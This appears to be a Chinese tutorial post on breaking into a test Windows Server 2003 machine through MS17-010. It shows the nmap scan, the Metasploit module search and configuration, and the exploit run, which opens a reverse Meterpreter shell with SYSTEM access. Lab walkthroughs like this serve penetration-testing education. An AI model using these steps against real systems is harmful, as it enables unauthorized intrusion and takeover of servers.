根据上篇文章的思路,来测试侵入一个存在ms17-010漏洞的windows server 2003服务器。
一、因为测试靶机就一台,也不用来扫描整个网段了。。直接调用NSE脚本来判断指定IP服务器是否存在已知的漏洞。
根据下扫描结果可以看出,192.168.1.83这台服务器存在ms17-010漏洞。可以到metasploit中查找是否存在相应的模块可以利用。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
root@kali:~# nmap --script=vuln 192.168.1.83 Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-11 01:44 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.1.83 Host is up (0.014s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3000/tcp open ppp 3389/tcp open ms-wbt-server |_ssl-ccs-injection: No reply from server (TIMEOUT) |_sslv2-drown: 5432/tcp open postgresql |_sslv2-drown: 8086/tcp open d-s-n 8093/tcp open unknown 8888/tcp open sun-answerbook Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Nmap done: 1 IP address (1 host up) scanned in 100.88 seconds root@kali:~# |
二、使用Metasploit工具来利用指定的漏洞模块尝试侵入目标服务器
2.1、直接在终端中输入 msfconsole
命令即可在kali linux中启动Metasploit工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f EFLAGS: 00010046 eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 ds: 0018 es: 0018 ss: 0018 Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff.................. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00 Aiee, Killing Interrupt handler Kernel panic: Attempted to kill the idle task! In swapper task - not syncing =[ metasploit v4.17.9-dev ] + -- --=[ 1806 exploits - 1027 auxiliary - 312 post ] + -- --=[ 539 payloads - 42 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > |
2.2、使用 search
命令后面跟上关键字即可模糊查找指定模块
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
msf > search ms17_010 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution msf > |
2.3、使用 use
命令后面跟上模块名,即可进入该模块环境下使用其进行渗透作业
1 2 |
msf > use windows/smb/ms17_010_psexec msf exploit(windows/smb/ms17_010_psexec) > |
2.4、使用 show options
命令列出当前使用的模块正确运行所需要配置的所有参数(根据Required字段值来判断对应参数是否为必填项)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
msf exploit(windows/smb/ms17_010_psexec) > show options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOST yes The target address RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic msf exploit(windows/smb/ms17_010_psexec) > |
2.5、使用 set
命令对某个参数进行设置(同时启用该参数),使用 unset
命令可以禁用相关参数
1 2 3 4 5 6 7 8 9 10 11 12 13 |
msf exploit(windows/smb/ms17_010_psexec) > set DEGTRACE false DEGTRACE => false msf exploit(windows/smb/ms17_010_psexec) > set LEAKATTEMPTS 99 LEAKATTEMPTS => 99 msf exploit(windows/smb/ms17_010_psexec) > set NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt NAMED_PIPES => /usr/share/metasploit-framework/data/wordlists/named_pipes.txt msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.1.83 RHOST => 192.168.1.83 msf exploit(windows/smb/ms17_010_psexec) > set RPORT 445 RPORT => 445 msf exploit(windows/smb/ms17_010_psexec) > set SHARE ADMIN$ SHARE => ADMIN$ msf exploit(windows/smb/ms17_010_psexec) > |
2.6、配置完要正常使用模块所必须配置的参数后,即可使用 run
命令来运行这个模块
从下面输出可以看出,我们已经利用ms17_010漏洞模块成功侵入目标服务器,并打开了一个meterpreter的shell。这个里面我们可以直接输入dos命令来对系统进行操作:例如可以查下ip、创建用户、开启远程等。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
msf exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 192.168.122.175:4444 [*] 192.168.1.83:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2 [*] 192.168.1.83:445 - Filling barrel with fish... done [*] 192.168.1.83:445 - <---------------- | Entering Danger Zone | ----------------> [*] 192.168.1.83:445 - [*] Preparing dynamite... [*] 192.168.1.83:445 - [*] Trying stick 1 (x64)...Boom! [*] 192.168.1.83:445 - [+] Successfully Leaked Transaction! [*] 192.168.1.83:445 - [+] Successfully caught Fish-in-a-barrel [*] 192.168.1.83:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 192.168.1.83:445 - Reading from CONNECTION struct at: 0xfffffadf3623e020 [*] 192.168.1.83:445 - Built a write-what-where primitive... [+] 192.168.1.83:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.1.83:445 - Selecting native target [*] 192.168.1.83:445 - Uploading payload... BggYcruU.exe [*] 192.168.1.83:445 - Created \BggYcruU.exe... [+] 192.168.1.83:445 - Service started successfully... [*] 192.168.1.83:445 - Deleting \BggYcruU.exe... [*] Sending stage (179779 bytes) to 192.168.1.83 [*] Meterpreter session 1 opened (192.168.1.75:4444 -> 192.168.1.83:2335) at 2018-09-11 02:19:07 -0400 meterpreter > meterpreter > ifconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:50:56:C0:00:08 MTU : 1500 IPv4 Address : 192.168.1.83 IPv4 Netmask : 255.255.255.0 meterpreter > |